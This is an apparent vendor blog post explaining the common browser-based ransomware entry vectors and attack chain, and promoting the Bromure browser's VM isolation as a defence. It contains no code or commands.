Back to all posts
Published on · by Renaud Deraison

How modern ransomware gets in — and how Bromure shuts the door

Most ransomware does not start with a zero-day. It starts with a browser tab. Here is how the attack chain actually works in 2026 — and what it looks like when it lands on a browser that was built to absorb the hit.

The quickest way to lose every file you have is not a hacker in a hoodie. It is one click, inside one tab, on one ordinary afternoon. Ransomware is not a mystery. It is a pipeline — and most of that pipeline runs through the browser.

You have probably read more than one story by now. A hospital that cannot admit patients. A small law firm that cannot access a single client file. A municipal government that reverts to pen and paper for three weeks. A retired couple whose photos, tax returns, and every scanned document of the last twenty years are suddenly gone, replaced by a polite note in English and a wallet address.

Ransomware is everywhere, and it is growing. It is also — and this is the part that matters — almost entirely preventable at the point of entry, which, in 2026, is almost always the same place: a web page, loaded in an ordinary browser, on an ordinary day.

Ransomware is an industry, not a prank.

The image many people still hold — a lone attacker on a laptop — is forty years out of date. Modern ransomware is run as a business, with departments, budgets, salaries, HR disputes, customer-service hours, and in some cases quarterly reports.

A typical operation involves, at minimum:

  • Initial-access brokers whose entire business is selling "a foot in the door" to other gangs: credentials, a compromised server, a user whose machine has been quietly backdoored.
  • Affiliate programs (often branded as "ransomware-as-a-service") where the group that writes the encryptor takes a cut, and a loose network of "affiliates" does the actual intrusions.
  • Negotiation teams who staff chat lines, measure your company's revenue from public filings, and price the ransom accordingly.
  • Data-exfiltration teams whose only job is to steal files before anything gets encrypted, so that even if you restore from backup, they can threaten to publish.
  • Launder-and-cash-out teams handling the cryptocurrency side.

The point is simple: the people on the other side of this are professionals, working full-time, with an operations budget. The advice "be more careful" is not a defensive plan against a professional industry. It is a shrug.

How it actually gets in.

Almost every modern ransomware chain begins the same way: somebody opens a web page.

Phishing email linkMalvertisingSEO poisoningWatering holeClickFix pageFake update promptYour filesone click awayAll six vectors route through an ordinary browser on an ordinary computer.
Six of the most common modern ransomware entry points. Every one of them routes through a browser on an ordinary user's machine — not through a firewall, not through a VPN, not through a server-side exploit.

Briefly, the big six:

Phishing email links

The oldest vector, still the most productive. A plausible email — package tracking, shared document, invoice — routes to a page that either drops a payload directly or harvests credentials used later to access the victim's network.

Malvertising

Legitimate ad networks serving malicious creatives. A real news site, a real weather site, a real recipe site — all display an ad that silently redirects the browser to an exploit kit. The site owner is not complicit; the ad network got fooled.

SEO poisoning

The user searches for a tool — a PDF converter, a VPN installer, a free font. The top result is a fake page that ranks well because the attacker has spent months on it. The download looks right, is signed, installs, and ships a second-stage loader with it.

Watering holes

A niche site — a professional association, a specialist forum, a supplier portal — is quietly compromised, and every visitor is served a targeted payload. The attacker does not need a wide net; just the right one.

ClickFix pages

A modern favorite. A page pretends to be a CAPTCHA, an error message, or a "fix this to continue" prompt. It silently writes a PowerShell or Terminal command into the clipboard and instructs the user to press a key combination and paste. The command runs on the host, outside the browser, doing whatever the attacker wants.

Fake update prompts

"Your browser is out of date. Click here to update." The page looks like Chrome, Firefox, or Safari. The download is a loader. Every step feels normal because every step was engineered to.

Some smaller but still relevant vectors round out the list: malicious browser extensions installed from outside official stores; compromised supply-chain packages; and — rarely, but catastrophically — genuine browser zero-days. The common thread is boring and important: a web page gets loaded, and everything bad that follows is downstream of that one event.

The chain, step by step.

Once initial access has succeeded, the rest of the chain is mechanical.

1 · INITIAL ACCESSTab opensthe wrong page loads2 · FOOTHOLDPayload delivereddownload, exploit, paste3 · PERSISTENCEPlants itselfscheduled task, service4 · ESCALATIONBecomes rootlocal priv-esc5 · LATERAL MOVEMENTSpreads sidewaysshares, SMB, RDP6 · EXFILTRATIONSteals everythingdouble extortion7 · ENCRYPTIONLocks the filesevery drive, every share8 · RANSOMThe note arriveswallet + countdown
What actually happens after a user visits the wrong page. Everything after 'initial access' runs on the user's own computer — not on a server somewhere — and by the time encryption starts, the attacker has been quietly installed for hours, days, or weeks.

That entire chain — from the moment the tab loaded to the moment the ransom note appears on the desktop — is one long sequence that depends on one thing: step 2 succeeding. If the payload in step 2 cannot reach the user's files, keychain, tasks, services, or network shares, the chain stops. Every step after step 2 assumes the attacker has their hand on the machine. If they never got their hand on the machine, nothing else happens.

The browser is the door. We made it a wall.

Traditional browsers have been patched, hardened, sandboxed, fuzzed, and stress-tested for twenty years. They are also, by a wide margin, the second-largest attack surface on any computer — bigger than every other application, second only to the operating system that runs them. That is not because their engineers are bad. It is because a browser has to parse every byte of the entire internet and somehow produce a safe pixel. That is a losing problem to be handed.

Bromure does not try to win that problem on the browser's terms. It changes the geometry.

Traditional browserYOUR COMPUTERBrowser tabevil.example.com/invoice.pdfPAYLOADDocumentsENCRYPTEDPhotosENCRYPTEDKeychainSTOLENBackupsENCRYPTEDNetworkSPREADINGThe ransom note arrives next.BromureYOUR COMPUTERSEALED SESSIONBrowser tabevil.example.com/invoice.pdfPAYLOADBLOCKEDDocumentssafePhotossafeKeychainsafeBackupssafeNetworksafe
Same ransomware payload, same exploit, same malicious page. On the left, a traditional browser: the payload lands in the same address space as your files. On the right, Bromure: the payload lands in a disposable VM that contains nothing of yours — and the VM is destroyed when you close the window.

In Bromure, every tab runs inside a sealed virtual machine. The browser, its renderer, the JavaScript engine, the PDF parser, the video codec — all of it is sandwiched inside a disposable guest VM that has no access to your files, your keychain, your webcam, your photos, or your local network. The exploit that leveraged a browser bug lands inside a world that does not contain your life.

When you close the window on a non-persistent session, the entire VM — the browser state, the cookies, whatever got downloaded, whatever planted itself, whatever was trying to reach out — is wiped. You do not need to know it was there. You do not need to clean anything up.

Isolation is the first wall.

A traditional browser running in your user account shares file permissions with you. That is architecture, not a mistake, and it is what the entire kill chain after step 2 depends on. Bromure breaks that assumption at the root. The browser process does not run in your user account — it runs in a separate machine entirely, and what that machine can see is limited to what you explicitly gave it.

Downloads, webcam, clipboard, local network — off by default.

Every capability in Bromure starts denied. A drive-by download that "just works" in a traditional browser cannot write a file in Bromure unless you have previously said this profile is allowed to save files. The same goes for webcam, microphone, clipboard access, and local-network requests. Most profiles do not need most of these. Most profiles never get most of these.

Profiles are not folders. They are separate machines.

Your banking. Your work email. Your "click any link" profile for links from the group chat. In Bromure, each of these is its own VM, with its own storage, its own cookies, its own permissions, its own visible border color. If the "random links" profile is compromised — a thing that is, in Bromure, already hard — it cannot reach the "banking" profile's cookies. They are not in the same computer.

Sessions end. Worlds end with them.

Session activeSEALED VMLOADERSTAGE 2COOKIESWindow closesDESTROYING…snapshot discardedNext time you open itFRESH WORLDNothing left behind.No persistence.No loader.Not a single byte.
Close the window, and an entire disposable world — with whatever malicious software may have established itself inside it — goes away. There is nothing left for the attacker to come back to.

The third step of every ransomware chain — persistence — is the attacker's most valuable move. Scheduled tasks, system services, login items, launch daemons: once they plant themselves, they come back. Against a persistent host, the attacker wins on patience alone. Against a disposable Bromure session, there is nothing to come back to. The world the attacker lived in is gone.

What isolation does not solve — and what to do about it.

Isolation is not magic. Two things it does not fix on its own:

Social engineering against the user

A page that convinces a user to copy a command and run it in a real Terminal window has bypassed the browser entirely — the command now runs on the host, not in the sandbox. This is how ClickFix works. The fix for this is a separate layer: the browser must see the clipboard payload the page wrote, flag it, and warn the user before they paste. That is a feature on its way; in the meantime, never run a command a web page told you to run, and teach the people in your household to do the same.

Real credentials handed to a real attacker

If a convincing phishing page gets the user to type a real password into a real form, no isolation model helps — the credentials just left the sandbox by way of your keyboard. The fix for this is phishing-specific: warn before a password is about to be typed on a new domain; detect brand impersonation; catch cross-domain password submissions. That work is in progress and will land in a coming release.

Until those layers land, isolation alone already takes out the most reliable industrial ransomware chain — the one that goes "tab → file on disk → persistence → encryption." That is the chain the attacker industry monetises. That is the chain Bromure breaks.

The attack industry is not slowing down. Neither are we.

Ransomware is not going to be stopped by better advice, or by asking your relatives to be more careful, or by pretending that the people on the other side will one day get tired and go home. They are not going to get tired. They have quarterly targets.

What is going to stop them, one machine at a time, is a browser that was designed from the first line of code to assume a web page is hostile and to make sure that nothing a hostile web page does can reach anything you care about. A browser where the worst-case outcome of clicking the wrong link, on the wrong day, in the wrong mood, is that you close a window.

That is what Bromure is for. Install it, make it your default, and turn the rest into somebody else's problem.